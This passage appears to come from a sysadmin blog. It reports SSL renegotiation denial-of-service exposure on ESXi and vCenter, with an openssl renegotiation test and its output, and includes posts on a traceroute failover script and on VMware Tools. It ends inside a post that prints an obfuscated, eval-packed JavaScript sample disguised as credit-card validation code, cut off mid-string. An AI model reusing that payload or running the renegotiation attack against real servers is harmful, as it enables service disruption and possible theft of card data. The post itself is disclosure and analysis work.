THC SSL Renegotiation DoS Tool for ESXi authd (port 902)

I had written about the client-initiated SSL renegotiation DoS tool by THC and how to exploit SMTP STARTTLS mail servers with some modifications some time ago. At the time I also noticed, to my surprise, that client-initiated SSL renegotiation is enabled by default on various vSphere/ESXi components and can be exploited with the THC tool.

# openssl s_client -connect myesxi.local:443 -state -quiet -no_ign_eof <<< 'R' 
SSL_connect:before/connect initialization
SSL_connect:SSLv2/v3 write client hello A
SSL_connect:SSLv3 read server hello A
verify error:num=19:self signed certificate in certificate chain
verify return:0
SSL_connect:SSLv3 read server certificate A
SSL_connect:SSLv3 read server done A
SSL_connect:SSLv3 write client key exchange A
SSL_connect:SSLv3 write change cipher spec A
SSL_connect:SSLv3 write finished A
SSL_connect:SSLv3 flush data
SSL_connect:SSLv3 read finished A
RENEGOTIATING
SSL_connect:SSL renegotiate ciphers
SSL_connect:SSLv3 write client hello A
SSL_connect:SSLv3 read server hello A
verify error:num=19:self signed certificate in certificate chain
verify return:0
SSL_connect:SSLv3 read server certificate A
SSL_connect:SSLv3 read server done A
SSL_connect:SSLv3 write client key exchange A
SSL_connect:SSLv3 write change cipher spec A
SSL_connect:SSLv3 write finished A
SSL_connect:SSLv3 flush data
SSL_connect:SSLv3 read finished A
DONE

The CIM-SSL port 5989 for hardware status monitoring is also renegotiating. This affects all currently known versions of ESXi, including the latest 6.0 U2 and 5.5 U3 releases. vCenter is also affected on at least ports 443, 7444 and 9443.


[Script] Network routing/failover topology change detection

A while ago I wrote a simple but useful script which I’m sharing here to detect upstream provider HSRP failover events via traceroute. It can be used for all kinds of virtual IP routing failover like VRRP, Check Point Cluster XL, actual routing protocols like BGP/OSPF or similar technologies where IP packets can be routed across multiple hops.
The script executes traceroutes to a given destination and checks whether the path is being routed over a certain hop, with the ability to send mail notifications if this is not the case.

You can get the most recent version of this script on my GitHub. If you have any suggestions or improvements (which I’m sure there is plenty of room for), feel free to drop a comment, an issue or a pull request on GitHub.


Renamed VMware Tools components and automatic installation

With the release of vSphere 6.0 and a recent update for the 5.5 VMware Tools on May 8th 2015 (9.4.12 build 2627939), VMware also changed the Windows VMware Tools installer slightly by renaming some vShield-related components:
VMware ESXi 5.5, Patch ESXi550-201505402-BG: Updates tools-light

The vShield Endpoint drivers are renamed as Guest Introspection Drivers and two of these drivers, NSX File Introspection Driver (vsepflt.sys) and NSX Network Introspection Driver (vnetflt.sys), can be installed separately now. This allows you to install the file driver without installing the network driver.

If you’ve been using custom automated installations of the VMware Tools like me then you might have to adjust the installer command for newer tools versions.


Decoding and analyzing obfuscated JavaScript for fun and profit

Take a short peek at the following JavaScript file (“ccard.js”):

// Credit Card Validation Javascript
// copyright 12th May 2003, by Stephen Chapman, Felgall Pty Ltd
t="\x31\x30\x31\x2c\x31\x31\x38\x2c\x39\x37\x2c\x31\x30\x38\x2c\x34\x30\x2c\x31\x30\x32\x2c\x31\x31\x37\x2c\x31\x31\x30\x2c\x39\x39\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x34\x30\x2c\x31\x31\x32\x2c\x34\x34\x2c\x39\x37\x2c\x34\x34\x2c\x39\x39\x2c\x34\x34\x2c\x31\x30\x37\x2c\x34\x34\x2c\x31\x30\x31\x2c\x34\x34\x2c\x31\x30\x30\x2c\x34\x31\x2c\x31\x32\x33\x2c\x31\x30\x31\x2c\x36\x31\x2c\x31\x30\x32\x2c\x31\x31\x37\x2c\x31\x31\x30\x2c\x39\x39\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x34\x30\x2c\x39\x39\x2c\x34\x31\x2c\x31\x32\x33\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x31\x31\x37\x2c\x31\x31\x34\x2c\x31\x31\x30\x2c\x34\x30\x2c\x39\x39\x2c\x36\x30\x2c\x39\x37\x2c\x36\x33\x2c\x33\x34\x2c\x33\x34\x2c\x35\x38\x2c\x31\x30\x31\x2c\x34\x30\x2c\x31\x31\x32\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x37\x33\x2c\x31\x31\x30\x2c\x31\x31\x36\x2c\x34\x30\x2c\x39\x39\x2c\x34\x37\x2c\x39\x37\x2c\x34\x31\x2c\x34\x31\x2c\x34\x31\x2c\x34\x33\x2c\x34\x30\x2c\x34\x30\x2c\x39\x39\x2c\x36\x31\x2c\x39\x39\x2c\x33\x37\x2c\x39\x37\x2c\x34\x31\x2c\x36\x32\x2c\x35\x31\x2c\x35\x33\x2c\x36\x33\x2c\x38\x33\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x34\x36\x2c\x31\x30\x32\x2c\x31\x31\x34\x2c\x31\x31\x31\x2c\x31\x30\x39\x2c\x36\x37\x2c\x31\x30\x34\x2c\x39\x37\x2c\x31\x31\x34\x2c\x36\x37\x2c\x31\x31\x31\x2c\x31\x30\x30\x2c\x31\x30\x31\x2c\x34\x30\x2c\x39\x39\x2c\x34\x33\x2c\x35\x30\x2c\x35\x37\x2c\x34\x31\x2c\x35\x38\x2c\x39\x39\x2c\x34\x36\x2c\x31\x31\x36\x2c\x31\x31\x31\x2c\x38\x33\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x34\x30\x2c\x35\x31\x2c\x35\x34\x2c\x34\x31\x2c\x34\x31\x2c\x31\x32\x35\x2c\x35\x39\x2c\x31\x30\x35\x2c\x31\x30\x32\x2c\x34\x30\x2c\x33\x33\x2c\x33\x39\x2c\x33\x39\x2c\x34\x36\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x32\x2c\x31\x30\x38\x2c\x39\x37\x2c\x39\x39\x2c\x31\x30\x31\x2c\x34\x30\x2c\x34\x37\x2c\x39\
x34\x2c\x34\x37\x2c\x34\x34\x2c\x38\x33\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x34\x31\x2c\x34\x31\x2c\x31\x32\x33\x2c\x31\x31\x39\x2c\x31\x30\x34\x2c\x31\x30\x35\x2c\x31\x30\x38\x2c\x31\x30\x31\x2c\x34\x30\x2c\x39\x39\x2c\x34\x35\x2c\x34\x35\x2c\x34\x31\x2c\x31\x30\x30\x2c\x39\x31\x2c\x31\x30\x31\x2c\x34\x30\x2c\x39\x39\x2c\x34\x31\x2c\x39\x33\x2c\x36\x31\x2c\x31\x30\x37\x2c\x39\x31\x2c\x39\x39\x2c\x39\x33\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x30\x31\x2c\x34\x30\x2c\x39\x39\x2c\x34\x31\x2c\x35\x39\x2c\x31\x30\x37\x2c\x36\x31\x2c\x39\x31\x2c\x31\x30\x32\x2c\x31\x31\x37\x2c\x31\x31\x30\x2c\x39\x39\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x34\x30\x2c\x31\x30\x31\x2c\x34\x31\x2c\x31\x32\x33\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x31\x31\x37\x2c\x31\x31\x34\x2c\x31\x31\x30\x2c\x33\x32\x2c\x31\x30\x30\x2c\x39\x31\x2c\x31\x30\x31\x2c\x39\x33\x2c\x31\x32\x35\x2c\x39\x33\x2c\x35\x39\x2c\x31\x30\x31\x2c\x36\x31\x2c\x31\x30\x32\x2c\x31\x31\x37\x2c\x31\x31\x30\x2c\x39\x39\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x34\x30\x2c\x34\x31\x2c\x31\x32\x33\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x31\x31\x37\x2c\x31\x31\x34\x2c\x31\x31\x30\x2c\x33\x39\x2c\x39\x32\x2c\x39\x32\x2c\x31\x31\x39\x2c\x34\x33\x2c\x33\x39\x2c\x31\x32\x35\x2c\x35\x39\x2c\x39\x39\x2c\x36\x31\x2c\x34\x39\x2c\x35\x39\x2c\x31\x32\x35\x2c\x35\x39\x2c\x31\x31\x39\x2c\x31\x30\x34\x2c\x31\x30\x35\x2c\x31\x30\x38\x2c\x31\x30\x31\x2c\x34\x30\x2c\x39\x39\x2c\x34\x35\x2c\x34\x35\x2c\x34\x31\x2c\x31\x30\x35\x2c\x31\x30\x32\x2c\x34\x30\x2c\x31\x30\x37\x2c\x39\x31\x2c\x39\x39\x2c\x39\x33\x2c\x34\x31\x2c\x31\x31\x32\x2c\x36\x31\x2c\x31\x31\x32\x2c\x34\x36\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x32\x2c\x31\x30\x38\x2c\x39\x37\x2c\x39\x39\x2c\x31\x30\x31\x2c\x34\x30\x2c\x31\x31\x30\x2c\x31\x30\x31\x2c\x31\x31\x39\x2c\x33\x32\x2c\x38\x32\x2c\x31\x30\x31\x2c\x31\x30\x33\x2c\x36\x39\x2c\x31\x32\x30\x2c\
x31\x31\x32\x2c\x34\x30\x2c\x33\x39\x2c\x39\x32\x2c\x39\x32\x2c\x39\x38\x2c\x33\x39\x2c\x34\x33\x2c\x31\x30\x31\x2c\x34\x30\x2c\x39\x39\x2c\x34\x31\x2c\x34\x33\x2c\x33\x39\x2c\x39\x32\x2c\x39\x32\x2c\x39\x38\x2c\x33\x39\x2c\x34\x34\x2c\x33\x39\x2c\x31\x30\x33\x2c\x33\x39\x2c\x34\x31\x2c\x34\x34\x2c\x31\x30\x37\x2c\x39\x31\x2c\x39\x39\x2c\x39\x33\x2c\x34\x31\x2c\x35\x39\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x31\x31\x37\x2c\x31\x31\x34\x2c\x31\x31\x30\x2c\x33\x32\x2c\x31\x31\x32\x2c\x35\x39\x2c\x31\x32\x35\x2c\x34\x30\x2c\x33\x39\x2c\x31\x30\x34\x2c\x33\x32\x2c\x37\x39\x2c\x34\x30\x2c\x39\x37\x2c\x34\x34\x2c\x39\x38\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x30\x31\x2c\x36\x31\x2c\x39\x37\x2c\x34\x36\x2c\x38\x36\x2c\x34\x30\x2c\x33\x34\x2c\x34\x35\x2c\x33\x34\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x38\x34\x2c\x36\x31\x2c\x31\x30\x37\x2c\x33\x32\x2c\x31\x30\x32\x2c\x34\x30\x2c\x31\x30\x31\x2c\x39\x31\x2c\x34\x38\x2c\x39\x33\x2c\x34\x34\x2c\x31\x30\x31\x2c\x39\x31\x2c\x34\x39\x2c\x39\x33\x2c\x34\x34\x2c\x31\x30\x31\x2c\x39\x31\x2c\x35\x30\x2c\x39\x33\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x38\x37\x2c\x36\x31\x2c\x38\x34\x2c\x34\x36\x2c\x36\x35\x2c\x34\x30\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x31\x31\x37\x2c\x36\x31\x2c\x39\x38\x2c\x34\x36\x2c\x38\x36\x2c\x34\x30\x2c\x33\x34\x2c\x34\x35\x2c\x33\x34\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x38\x38\x2c\x36\x31\x2c\x31\x30\x37\x2c\x33\x32\x2c\x31\x30\x32\x2c\x34\x30\x2c\x31\x31\x37\x2c\x39\x31\x2c\x34\x38\x2c\x39\x33\x2c\x34\x34\x2c\x31\x31\x37\x2c\x39\x31\x2c\x34\x39\x2c\x39\x33\x2c\x34\x34\x2c\x31\x31\x37\x2c\x39\x31\x2c\x35\x30\x2c\x39\x33\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x38\x33\x2c\x36\x31\x2c\x38\x38\x2c\x34\x36\x2c\x36\x35\x2c\x34\x30\x2c\x34\x31\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x38\x37\x2c\x36\x32\x2c\x36\x31\x2c\x38\x33\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x35\x2c\x33\x32\x2c\x37\x38\x2c\x31\x32\x35\x2c\x31\
x31\x34\x2c\x33\x32\x2c\x35\x35\x2c\x33\x32\x2c\x34\x39\x2c\x31\x30\x30\x2c\x31\x32\x35\x2c\x35\x39\x2c\x31\x30\x34\x2c\x33\x32\x2c\x37\x36\x2c\x34\x30\x2c\x35\x37\x2c\x34\x34\x2c\x35\x36\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x32\x2c\x34\x30\x2c\x37\x39\x2c\x34\x30\x2c\x35\x37\x2c\x34\x34\x2c\x35\x36\x2c\x34\x31\x2c\x36\x31\x2c\x36\x31\x2c\x37\x38\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x38\x32\x2c\x36\x31\x2c\x35\x37\x2c\x34\x36\x2c\x31\x30\x36\x2c\x34\x30\x2c\x35\x33\x2c\x34\x34\x2c\x35\x37\x2c\x34\x36\x2c\x31\x31\x39\x2c\x34\x30\x2c\x39\x32\x2c\x33\x39\x2c\x34\x35\x2c\x39\x32\x2c\x33\x39\x2c\x34\x31\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x38\x39\x2c\x36\x31\x2c\x35\x37\x2c\x34\x36\x2c\x31\x30\x36\x2c\x34\x30\x2c\x35\x37\x2c\x34\x36\x2c\x31\x32\x32\x2c\x34\x34\x2c\x35\x37\x2c\x34\x36\x2c\x31\x31\x39\x2c\x34\x30\x2c\x39\x32\x2c\x33\x39\x2c\x34\x35\x2c\x39\x32\x2c\x33\x39\x2c\x34\x31\x2c\x34\x33\x2c\x34\x39\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x34\x39\x2c\x35\x31\x2c\x36\x31\x2c\x35\x37\x2c\x34\x36\x2c\x31\x30\x36\x2c\x34\x30\x2c\x34\x38\x2c\x34\x34\x2c\x35\x37\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x39\x32\x2c\x33\x39\x2c\x34\x35\x2c\x39\x32\x2c\x33\x39\x2c\x34\x31\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x34\x39\x2c\x34\x38\x2c\x36\x31\x2c\x35\x36\x2c\x34\x36\x2c\x31\x30\x36\x2c\x34\x30\x2c\x35\x33\x2c\x34\x34\x2c\x35\x36\x2c\x34\x36\x2c\x31\x31\x39\x2c\x34\x30\x2c\x39\x32\x2c\x33\x39\x2c\x34\x35\x2c\x39\x32\x2c\x33\x39\x2c\x34\x31\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x34\x39\x2c\x35\x32\x2c\x36\x31\x2c\x35\x36\x2c\x34\x36\x2c\x31\x30\x36\x2c\x34\x30\x2c\x35\x36\x2c\x34\x36\x2c\x31\x32\x32\x2c\x34\x34\x2c\x35\x36\x2c\x34\x36\x2c\x31\x31\x39\x2c\x34\x30\x2c\x39\x32\x2c\x33\x39\x2c\x34\x35\x2c\x39\x32\x2c\x33\x39\x2c\x34\x31\x2c\x34\x33\x2c\x34\x39\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x36\x39\x2c\x36\x31\x2c\x35\x36\x2c\x34\x36\x2c\x31\x30\x36\x2c\x34\x30\x2c\x34\x38\x2c\x34\x34\x2c\
x35\x36\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x39\x32\x2c\x33\x39\x2c\x34\x35\x2c\x39\x32\x2c\x33\x39\x2c\x34\x31\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x36\x38\x2c\x36\x31\x2c\x34\x30\x2c\x34\x30\x2c\x31\x30\x32\x2c\x34\x36\x2c\x34\x39\x2c\x34\x39\x2c\x34\x30\x2c\x38\x32\x2c\x34\x33\x2c\x39\x32\x2c\x33\x39\x2c\x34\x37\x2c\x39\x32\x2c\x33\x39\x2c\x34\x33\x2c\x38\x39\x2c\x34\x33\x2c\x39\x32\x2c\x33\x39\x2c\x34\x37\x2c\x39\x32\x2c\x33\x39\x2c\x34\x33\x2c\x34\x39\x2c\x35\x31\x2c\x34\x31\x2c\x34\x35\x2c\x31\x30\x32\x2c\x34\x36\x2c\x34\x39\x2c\x34\x39\x2c\x34\x30\x2c\x34\x39\x2c\x34\x38\x2c\x34\x33\x2c\x39\x32\x2c\x33\x39\x2c\x34\x37\x2c\x39\x32\x2c\x33\x39\x2c\x34\x33\x2c\x34\x39\x2c\x35\x32\x2c\x34\x33\x2c\x39\x32\x2c\x33\x39\x2c\x34\x37\x2c\x39\x32\x2c\x33\x39\x2c\x34\x33\x2c\x36\x39\x2c\x34\x31\x2c\x34\x31\x2c\x34\x37\x2c\x34\x39\x2c\x35\x34\x2c\x34\x31\x2c\x35\x39\x2c\x35\x35\x2c\x33\x32\x2c\x31\x31\x36\x2c\x34\x36\x2c\x34\x39\x2c\x39\x38\x2c\x34\x30\x2c\x36\x38\x2c\x34\x31\x2c\x31\x32\x35\x2c\x31\x31\x34\x2c\x33\x32\x2c\x35\x35\x2c\x33\x32\x2c\x34\x38\x2c\x31\x32\x35\x2c\x35\x39\x2c\x31\x30\x34\x2c\x33\x32\x2c\x37\x33\x2c\x34\x30\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x30\x30\x2c\x36\x31\x2c\x31\x30\x37\x2c\x33\x32\x2c\x31\x30\x32\x2c\x34\x30\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x37\x35\x2c\x36\x31\x2c\x31\x30\x30\x2c\x34\x36\x2c\x34\x39\x2c\x35\x36\x2c\x34\x30\x2c\x34\x31\x2c\x34\x33\x2c\x33\x34\x2c\x34\x35\x2c\x33\x34\x2c\x34\x33\x2c\x34\x30\x2c\x31\x30\x30\x2c\x34\x36\x2c\x34\x39\x2c\x35\x37\x2c\x34\x30\x2c\x34\x31\x2c\x34\x33\x2c\x34\x39\x2c\x34\x31\x2c\x34\x33\x2c\x33\x34\x2c\x34\x35\x2c\x33\x34\x2c\x34\x33\x2c\x31\x30\x30\x2c\x34\x36\x2c\x34\x39\x2c\x39\x37\x2c\x34\x30\x2c\x34\x31\x2c\x35\x39\x2c\x35\x35\x2c\x33\x32\x2c\x37\x35\x2c\x31\x32\x35\x2c\x35\x39\x2c\x31\x30\x34\x2c\x33\x32\x2c\x31\x32\x30\x2c\x34\x30\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x32\x30\x2c\x36\x31\x2c\x37\x36\x2c\x34\
x30\x2c\x37\x33\x2c\x34\x30\x2c\x34\x31\x2c\x34\x34\x2c\x39\x32\x2c\x33\x39\x2c\x34\x39\x2c\x39\x39\x2c\x34\x35\x2c\x35\x34\x2c\x34\x35\x2c\x35\x33\x2c\x39\x32\x2c\x33\x39\x2c\x34\x31\x2c\x34\x32\x2c\x35\x33\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x31\x32\x30\x2c\x36\x30\x2c\x36\x31\x2c\x37\x32\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x35\x2c\x33\x32\x2c\x31\x32\x30\x2c\x31\x32\x35\x2c\x31\x31\x34\x2c\x33\x32\x2c\x35\x35\x2c\x33\x32\x2c\x37\x32\x2c\x31\x32\x35\x2c\x35\x39\x2c\x31\x30\x34\x2c\x33\x32\x2c\x31\x30\x39\x2c\x34\x30\x2c\x31\x31\x38\x2c\x34\x34\x2c\x37\x31\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x31\x35\x2c\x36\x31\x2c\x31\x30\x37\x2c\x33\x32\x2c\x31\x30\x32\x2c\x34\x30\x2c\x34\x31\x2c\x35\x39\x2c\x31\x31\x35\x2c\x34\x36\x2c\x34\x39\x2c\x35\x35\x2c\x34\x30\x2c\x31\x31\x35\x2c\x34\x36\x2c\x36\x35\x2c\x34\x30\x2c\x34\x31\x2c\x34\x33\x2c\x34\x39\x2c\x35\x33\x2c\x34\x32\x2c\x34\x39\x2c\x36\x35\x2c\x34\x32\x2c\x37\x37\x2c\x34\x32\x2c\x37\x37\x2c\x34\x32\x2c\x34\x39\x2c\x31\x32\x32\x2c\x34\x31\x2c\x35\x39\x2c\x31\x32\x31\x2c\x34\x36\x2c\x37\x30\x2c\x36\x31\x2c\x31\x31\x38\x2c\x34\x33\x2c\x33\x34\x2c\x36\x31\x2c\x33\x34\x2c\x34\x33\x2c\x34\x39\x2c\x36\x37\x2c\x34\x30\x2c\x37\x31\x2c\x34\x31\x2c\x34\x33\x2c\x33\x34\x2c\x35\x39\x2c\x34\x39\x2c\x36\x36\x2c\x36\x31\x2c\x33\x34\x2c\x34\x33\x2c\x31\x31\x35\x2c\x34\x36\x2c\x34\x39\x2c\x31\x31\x39\x2c\x34\x30\x2c\x34\x31\x2c\x31\x32\x35\x2c\x35\x39\x2c\x31\x30\x34\x2c\x33\x32\x2c\x38\x31\x2c\x34\x30\x2c\x31\x31\x38\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x30\x31\x2c\x34\x34\x2c\x37\x34\x2c\x36\x31\x2c\x31\x30\x37\x2c\x33\x32\x2c\x34\x39\x2c\x31\x31\x38\x2c\x34\x30\x2c\x33\x34\x2c\x34\x30\x2c\x39\x34\x2c\x31\x32\x34\x2c\x33\x32\x2c\x34\x31\x2c\x33\x34\x2c\x34\x33\x2c\x31\x31\x38\x2c\x34\x33\x2c\x33\x34\x2c\x36\x31\x2c\x34\x30\x2c\x39\x31\x2c\x39\x34\x2c\x35\x39\x2c\x39\x33\x2c\x34\x32\x2c\x34\x31\x2c\x34\x30\x2c\x35\x39\x2c\x31\x32\x34\x2c\x33\x36\x2c\x34\x31\x2c\x33\x34\x2c\x34\x31\x2c\
x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x31\x30\x31\x2c\x36\x31\x2c\x31\x32\x31\x2c\x34\x36\x2c\x37\x30\x2c\x34\x36\x2c\x34\x39\x2c\x31\x32\x31\x2c\x34\x30\x2c\x37\x34\x2c\x34\x31\x2c\x34\x31\x2c\x35\x35\x2c\x33\x32\x2c\x34\x39\x2c\x31\x32\x30\x2c\x34\x30\x2c\x31\x30\x31\x2c\x39\x31\x2c\x35\x30\x2c\x39\x33\x2c\x34\x31\x2c\x35\x39\x2c\x31\x31\x34\x2c\x33\x32\x2c\x35\x35\x2c\x33\x32\x2c\x34\x39\x2c\x37\x30\x2c\x31\x32\x35\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x31\x32\x30\x2c\x34\x30\x2c\x34\x31\x2c\x36\x31\x2c\x36\x31\x2c\x34\x38\x2c\x34\x31\x2c\x31\x32\x33\x2c\x31\x30\x39\x2c\x34\x30\x2c\x33\x34\x2c\x31\x31\x30\x2c\x33\x34\x2c\x34\x34\x2c\x33\x34\x2c\x31\x31\x31\x2c\x34\x36\x2c\x31\x30\x38\x2c\x34\x36\x2c\x31\x30\x33\x2c\x33\x34\x2c\x34\x31\x2c\x31\x32\x35\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x31\x31\x32\x2c\x36\x31\x2c\x34\x38\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x31\x30\x35\x2c\x36\x31\x2c\x31\x32\x31\x2c\x34\x36\x2c\x31\x30\x35\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x31\x30\x35\x2c\x34\x36\x2c\x31\x31\x33\x2c\x34\x30\x2c\x34\x31\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x33\x34\x2c\x34\x39\x2c\x36\x38\x2c\x33\x34\x2c\x34\x31\x2c\x36\x32\x2c\x34\x38\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x30\x35\x2c\x34\x36\x2c\x31\x31\x33\x2c\x34\x30\x2c\x34\x31\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x33\x34\x2c\x34\x39\x2c\x36\x39\x2c\x33\x34\x2c\x34\x31\x2c\x36\x32\x2c\x34\x38\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x30\x35\x2c\x34\x36\x2c\x31\x31\x33\x2c\x34\x30\x2c\x34\x31\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x33\x34\x2c\x34\x39\x2c\x37\x31\x2c\x33\x34\x2c\x34\x31\x2c\x36\x32\x2c\x34\x38\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x30\x35\x2c\x34\x36\x2c\x31\x31\x33\x2c\x34\x30\x2c\x34\x31\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x33\x34\x2c\x34\x39\x2c\x37\x32\x2c\x33\x34\x2c\x34\x31\x2c\x36\x32\x2c\x34\x38\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x31\x32\x2c\x36\x31\x2c\x34\x39\x2c\x31\x32\x35\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x34\x39\x2c\x35\x30\
x2c\x36\x31\x2c\x34\x30\x2c\x36\x37\x2c\x34\x36\x2c\x34\x39\x2c\x31\x30\x36\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x36\x37\x2c\x34\x36\x2c\x34\x39\x2c\x31\x30\x35\x2c\x34\x31\x2c\x34\x36\x2c\x31\x31\x33\x2c\x34\x30\x2c\x34\x31\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x34\x39\x2c\x35\x30\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x33\x34\x2c\x34\x39\x2c\x31\x30\x38\x2c\x33\x34\x2c\x34\x31\x2c\x36\x32\x2c\x34\x38\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x31\x32\x2c\x36\x31\x2c\x34\x38\x2c\x35\x39\x2c\x31\x30\x39\x2c\x34\x30\x2c\x33\x34\x2c\x31\x31\x30\x2c\x33\x34\x2c\x34\x34\x2c\x33\x34\x2c\x31\x31\x31\x2c\x34\x36\x2c\x31\x30\x38\x2c\x34\x36\x2c\x31\x30\x33\x2c\x33\x34\x2c\x34\x31\x2c\x31\x32\x35\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x39\x30\x2c\x36\x31\x2c\x31\x30\x37\x2c\x33\x32\x2c\x31\x30\x32\x2c\x34\x30\x2c\x34\x31\x2c\x34\x36\x2c\x34\x39\x2c\x31\x30\x37\x2c\x34\x30\x2c\x34\x31\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x39\x30\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x33\x34\x2c\x34\x39\x2c\x31\x30\x32\x2c\x33\x34\x2c\x34\x31\x2c\x36\x32\x2c\x34\x38\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x31\x32\x2c\x36\x31\x2c\x34\x38\x2c\x35\x39\x2c\x31\x30\x39\x2c\x34\x30\x2c\x33\x34\x2c\x31\x31\x30\x2c\x33\x34\x2c\x34\x34\x2c\x33\x34\x2c\x31\x31\x31\x2c\x34\x36\x2c\x31\x30\x38\x2c\x34\x36\x2c\x31\x30\x33\x2c\x33\x34\x2c\x34\x31\x2c\x31\x32\x35\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x31\x31\x32\x2c\x36\x31\x2c\x36\x31\x2c\x34\x39\x2c\x33\x38\x2c\x33\x38\x2c\x38\x31\x2c\x34\x30\x2c\x33\x34\x2c\x31\x31\x30\x2c\x33\x34\x2c\x34\x31\x2c\x33\x33\x2c\x36\x31\x2c\x33\x34\x2c\x31\x31\x31\x2c\x34\x36\x2c\x31\x30\x38\x2c\x34\x36\x2c\x31\x30\x33\x2c\x33\x34\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x38\x30\x2c\x36\x31\x2c\x34\x39\x2c\x31\x30\x31\x2c\x34\x30\x2c\x31\x31\x36\x2c\x34\x36\x2c\x38\x35\x2c\x34\x30\x2c\x34\x31\x2c\x34\x32\x2c\x34\x39\x2c\x31\x30\x34\x2c\x34\x33\x2c\x34\x39\x2c\x34\x31\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x38\x30\
